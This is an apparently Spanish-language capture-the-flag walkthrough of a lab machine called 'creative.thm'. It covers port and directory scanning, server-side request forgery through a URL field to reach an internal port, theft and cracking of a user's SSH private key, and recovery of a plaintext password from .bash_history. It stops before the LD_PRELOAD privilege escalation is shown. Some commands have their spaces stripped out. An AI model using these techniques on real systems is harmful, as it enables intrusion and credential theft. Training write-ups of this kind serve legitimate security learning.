Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-13 14:14 EDT
Nmap scan report for 10.10.181.92
Host is up (0.100s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://creative.thm
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), Linux 5.X (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:5.4 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), Linux 5.4 (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 131.12 ms 10.9.0.1
2 131.82 ms 10.10.181.92
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.27 seconds
Como utiliza un dominio tendremos que editarlo en nuestro archivo hosts...
sudonano/etc/hosts
<IP> creative.thm
Gobuster
gobusterdir-uhttp://creative.thm/-w<WORDLIST>
Info:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://creative.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 178] [--> http://creative.thm/assets/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
No encontramos nada aparentemente...
Una vez hecho esto (hosts) podremos visualizarla, pero aparentemente no hay nada que se pueda hackear, por lo que miraremos subdominios...
Nos saca el subdominio llamado beta por lo que entraremos a el de la siguiente manera...
URL: http://beta.creative.thm/
Y visualizaremos una pagina en la cual se puede insertar "URL's"
Por lo que buscaremos en el propio host de la maquina victima poniendo...
URL = http://127.0.0.1
Veremos que nos carga la pagina de forma rara, por lo que nos haremos una lista de puertos, para ver a que puerto se le relaciona con los directorios para poder escalar por ahi...
Abrimos BurpSuit capturamos la peticion de la URL y esa peticion la pasamos al Intruder para poder tocar todas las convinaciones de puertos que hay y en los cuales podamos hacer algo con el diccionario de los puertos...
Vemos que los 2 unicos puertos que nos lleva algun sitio es el 80 y 33, sabiendo que el 80 es de la pagina web, el 1337 sera nuestra clave para movernos entre directorios...
Si entramos dentro de este puerto nos apareceran los archivos del servidor, por lo que tendremos que irle añadiendo rutas a la URL para ir llendo a la flag del primer usuario...
Esa primera parte la codificamos en URL por si acaso
Y veremos la flag del primer usuario...
user.txt (flag1)
9a1ce90a7653d74ab98630b47b8b4a84
Despues si seguimos investigando en la /home/ Veremos que hay un .ssh y que dentro de el esta el id_rsa privado por lo que podremos conectarnos por ssh con su clave privada...
Para sacar la contraseña que te pedira de la clave privada haremos lo siguiente...
ssh2johnid_rsa><FILE>
john--wordlist=<WORDLIST><FILE>
Info:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness (id_rsa)
1g 0:00:00:24 DONE (2024-05-13 15:24) 0.04111g/s 39.47p/s 39.47c/s 39.47C/s xbox360..sandy
Use the "--show" option to display all of the cracked passwords reliably
Una vez sepamos la contraseña nos conectamos al ssh con la id_rsa...
chmod600id_rsa
ssh-iid_rsasaad@<IP>
Escalada de privilegios
Si miramos lo que contiene .bash_history veremos lo siguiente...
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
sudo -l
whomai
whoami
pwd
ls -al
sudo -l
ls -al
pwd
whoami
mysql -u root -p
netstat -antlp
mysql -u root
sudo su
ssh root@192.169.155.104
mysql -u user -p
mysql -u db_user -p
ls -ld /var/lib/mysql
ls -al
cat .bash_history
cat .bash_logout
nano .bashrc
ls -al
Vemos que la contraseña de este usuario es MyStrongestPasswordYet$4291
Si hacemos sudo -l sabiendo ya la contraseña...
Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD
User saad may run the following commands on m4lware:
(root) /usr/bin/ping
Podremos hacer ping como root, por lo que si hacemos lo siguiente...
En esa pagina te inica lo que puedes hacer, en nuestro caso utilizaremos ping
